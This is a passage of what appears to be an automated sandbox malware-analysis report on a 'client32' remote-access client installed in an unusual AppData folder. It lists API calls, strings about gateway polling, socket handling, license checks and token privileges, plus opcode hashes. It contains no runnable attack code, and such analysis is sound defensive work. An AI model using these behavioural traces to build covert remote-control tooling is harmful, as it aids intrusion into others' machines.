                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$AvailableConnectDataHeapHttpLoadQueryRequest
                                                                              • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                              • API String ID: 579908884-913974648
                                                                              • Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                              • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                              • Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                              • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 6EEF2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6EEF2ACB
                                                                                • Part of subcall function 6EEF2A90: _strrchr.LIBCMT ref: 6EEF2ADA
                                                                                • Part of subcall function 6EEF2A90: _strrchr.LIBCMT ref: 6EEF2AEA
                                                                                • Part of subcall function 6EEF2A90: wsprintfA.USER32 ref: 6EEF2B05
                                                                                • Part of subcall function 6EF0DBD0: _malloc.LIBCMT ref: 6EF0DBE9
                                                                                • Part of subcall function 6EF0DBD0: wsprintfA.USER32 ref: 6EF0DC04
                                                                                • Part of subcall function 6EF0DBD0: _memset.LIBCMT ref: 6EF0DC27
                                                                              • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6EF07057
                                                                              • InitializeCriticalSection.KERNEL32(6EF3B898), ref: 6EF070DF
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EF070EF
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EF07115
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EF0713B
                                                                              • WSAStartup.WSOCK32(00000101,6EF3B91A), ref: 6EF07167
                                                                              • _malloc.LIBCMT ref: 6EF071A3
                                                                                • Part of subcall function 6EF11B69: __FF_MSGBANNER.LIBCMT ref: 6EF11B82
                                                                                • Part of subcall function 6EF11B69: __NMSG_WRITE.LIBCMT ref: 6EF11B89
                                                                                • Part of subcall function 6EF11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6EF1D3C1,6EF16E81,00000001,6EF16E81,?,6EF1F447,00000018,6EF37738,0000000C,6EF1F4D7), ref: 6EF11BAE
                                                                              • _memset.LIBCMT ref: 6EF071D3
                                                                              • _calloc.LIBCMT ref: 6EF07214
                                                                              • _malloc.LIBCMT ref: 6EF0728B
                                                                              • _memset.LIBCMT ref: 6EF072C1
                                                                              • _malloc.LIBCMT ref: 6EF072CD
                                                                              • _memset.LIBCMT ref: 6EF07303
                                                                              • GetTickCount.KERNEL32 ref: 6EF07361
                                                                              • CreateThread.KERNEL32(00000000,00004000,6EF06BA0,00000000,00000000,6EF3BACC), ref: 6EF0737E
                                                                              • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6EF073AC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\,00000104), ref: 6EF07430
                                                                              • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\pci.ini), ref: 6EF074B0
                                                                              • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6EF074C0
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6EF07566
                                                                              • timeBeginPeriod.WINMM(00000001), ref: 6EF07573
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                              • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$134349$C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\$C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                              • API String ID: 3160247386-1963545668
                                                                              • Opcode ID: 14814a2392b13393e2a1c5c8315523fa979db56edb60b860c33db9caafd224f6
                                                                              • Instruction ID: 4e4e9bb2bd1dedcbbb552c90a55cc617cafbc9051442245c50193939e94f7570
                                                                              • Opcode Fuzzy Hash: 14814a2392b13393e2a1c5c8315523fa979db56edb60b860c33db9caafd224f6
                                                                              • Instruction Fuzzy Hash: 91D10EB19107259FEB20AFF49CB4B567B9DEF05348B14486AF809DB381E7729C458BE0
                                                                              APIs
                                                                                • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              • _fgets.LIBCMT ref: 110628E2
                                                                              • _strpbrk.LIBCMT ref: 11062949
                                                                              • _fgets.LIBCMT ref: 11062A4C
                                                                              • _strpbrk.LIBCMT ref: 11062AC3
                                                                              • __wcstoui64.LIBCMT ref: 11062ADC
                                                                              • _fgets.LIBCMT ref: 11062B55
                                                                              • _strpbrk.LIBCMT ref: 11062B7B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                              • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                              • API String ID: 716802716-1571441106
                                                                              • Opcode ID: 8c48605410795d9e3cd25b9d18f26d9f12cdafcf37fc271b1508f1aea2d58ae0
                                                                              • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                              • Opcode Fuzzy Hash: 8c48605410795d9e3cd25b9d18f26d9f12cdafcf37fc271b1508f1aea2d58ae0
                                                                              • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 6EEF5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6EEF8F91,00000000,00000000,6EF3B8DA,?,00000080), ref: 6EEF5852
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,?,00000000,00000000), ref: 6EEFAA11
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAA58
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAA68
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAA94
                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6EEFAB0B
                                                                              • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAB4E
                                                                              • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAB5A
                                                                              • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAB8E
                                                                              • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFABB1
                                                                              • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFABE3
                                                                              • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC18
                                                                              • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC21
                                                                              • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC29
                                                                              • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC65
                                                                              • WSASetBlockingHook.WSOCK32(6EEF63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC76
                                                                              • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC8F
                                                                              • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC96
                                                                              • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC9C
                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFACFD
                                                                              • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD04
                                                                              • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD0A
                                                                              • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD45
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD4F
                                                                              • InitializeCriticalSection.KERNEL32(-6EF3CB4A), ref: 6EEFADE6
                                                                                • Part of subcall function 6EEF8FB0: _memset.LIBCMT ref: 6EEF8FE4
                                                                                • Part of subcall function 6EEF8FB0: getsockname.WSOCK32(?,?,00000010,?,037F2CD0,?), ref: 6EEF9005
                                                                              • getsockname.WSOCK32(00000000,?,?), ref: 6EEFAE4B
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAE60
                                                                              • GetTickCount.KERNEL32 ref: 6EEFAE6C
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6EEFAE7A
                                                                              Strings
                                                                              • Connect error to %s using hijacked socket, error %d, xrefs: 6EEFAB17
                                                                              • *TcpNoDelay, xrefs: 6EEFABB8
                                                                              • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6EEFAD14
                                                                              • Cannot connect to gateway %s, error %d, xrefs: 6EEFACA6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                              • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                              • API String ID: 692187944-2561115898

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                              • IsWindow.USER32(00040414), ref: 11139F65
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139F73
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139FAB
                                                                              • GetForegroundWindow.USER32 ref: 11139FC6
                                                                              • EnableWindow.USER32(00040414,00000000), ref: 11139FE0
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 11139FFC
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                              • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                              • IsWindowVisible.USER32(00040414), ref: 1113A088
                                                                              • IsIconic.USER32(00040414), ref: 1113A095
                                                                              • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040414,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040414,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 1113A0D4
                                                                              • GetLastError.KERNEL32 ref: 1113A193
                                                                              • GetLastError.KERNEL32 ref: 1113A20B
                                                                              • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                              • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                              • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                              • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                              • API String ID: 2511061093-2542869446

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,EE49F673), ref: 1113489E
                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                              • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                              • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                              • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                              • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                              • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                              • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                              • API String ID: 263027137-1001504656
                                                                              APIs
                                                                              • #16.WSOCK32(00000000,009686C7,6EF03361,00000000,00000000,6EF03361,00000007), ref: 6EEF924C
                                                                              • WSAGetLastError.WSOCK32(00000000,009686C7,6EF03361,00000000,00000000,6EF03361,00000007), ref: 6EEF925B
                                                                              • GetTickCount.KERNEL32 ref: 6EEF9274
                                                                              • Sleep.KERNEL32(00000001,00000000,009686C7,6EF03361,00000000,00000000,6EF03361,00000007), ref: 6EEF92A8
                                                                              • GetTickCount.KERNEL32 ref: 6EEF92B0
                                                                              • Sleep.KERNEL32(00000014), ref: 6EEF92BC
                                                                              Strings
                                                                              • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6EEF922B
                                                                              • *RecvTimeout, xrefs: 6EEF927B
                                                                              • ReadSocket - Error %d reading response, xrefs: 6EEF92F7
                                                                              • ReadSocket - Would block, xrefs: 6EEF928A
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6EEF9226
                                                                              • ReadSocket - Connection has been closed by peer, xrefs: 6EEF92E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountSleepTick$ErrorLast
                                                                              • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                              • API String ID: 2495545493-2497412063
                                                                              • Opcode ID: 67b7e1b85a07a734c3b6a9abcf5299598ed9429308a6b5b89bd9a1742b28dbef
                                                                              • Instruction ID: a00dc7df9088a4e4eb63b60f3fa708e1a8357133cf2aeed3582989af9dfa14d4
                                                                              • Opcode Fuzzy Hash: 67b7e1b85a07a734c3b6a9abcf5299598ed9429308a6b5b89bd9a1742b28dbef
                                                                              • Instruction Fuzzy Hash: E331C275E10208EFEB10DFF8E884BCEB7B8EF45314F204869E948DB340E77299458691
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?,?,?,910C354D,94E48BC1,910C34B3,FFFFFFFF,00000000), ref: 6EF031E2
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6EF2ECB0), ref: 6EF031EC
                                                                              • GetSystemTime.KERNEL32(?,94E48BC1,910C34B3,FFFFFFFF,00000000), ref: 6EF0322A
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6EF2ECB0), ref: 6EF03234
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,?,910C354D), ref: 6EF032BE
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6EF032D3
                                                                              • GetCurrentThreadId.KERNEL32 ref: 6EF0334D
                                                                                • Part of subcall function 6EF0BA20: __strdup.LIBCMT ref: 6EF0BA3A
                                                                                • Part of subcall function 6EF0BB00: _free.LIBCMT ref: 6EF0BB2D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                              • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                              • API String ID: 1510130979-3441452530
                                                                              • Opcode ID: 060018e84d15ab3a751f0b7b8a6ac70073d7b9c9f3a3d0e43fbeb4f0c82fb2b8
                                                                              • Instruction ID: 8c4a49204a56be232f6c525e312f36c6308882600db8acc3e1d5d5a4f5ae9d5d
                                                                              • Opcode Fuzzy Hash: 060018e84d15ab3a751f0b7b8a6ac70073d7b9c9f3a3d0e43fbeb4f0c82fb2b8
                                                                              • Instruction Fuzzy Hash: 44616272910618AFCB14DFE4D8A4FEEB7B9FF49304F10491EE416A7280EB74A504DBA1
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                              • _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              • _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                              • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                              • API String ID: 3299820421-2117887902
                                                                              • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                              • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                              • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                              • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                              • CoUninitialize.OLE32(00000000), ref: 111169E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                              • String ID: SHELL32.DLL$SHGetSettings
                                                                              • API String ID: 4195908086-2348320231
                                                                              • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                              • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: NBCTL32.DLL$_License$serial_no
                                                                              • API String ID: 2102423945-35127696
                                                                              • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                              • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID: Client32$NSMWClass$NSMWClass
                                                                              • API String ID: 3192549508-611217420
                                                                              • Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                              • Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                              • EqualSid.ADVAPI32(?,00FD3B90,?,00000001,00000001), ref: 1109EDC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InformationToken$AllocateEqualInitialize
                                                                              • String ID:
                                                                              • API String ID: 1878589025-0
                                                                              • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                              • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,EE49F673,00080000,00000000,?), ref: 1109D88D
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                              • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                              • String ID:
                                                                              • API String ID: 2349140579-0
                                                                              APIs
                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                              • FindCloseChangeNotification.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
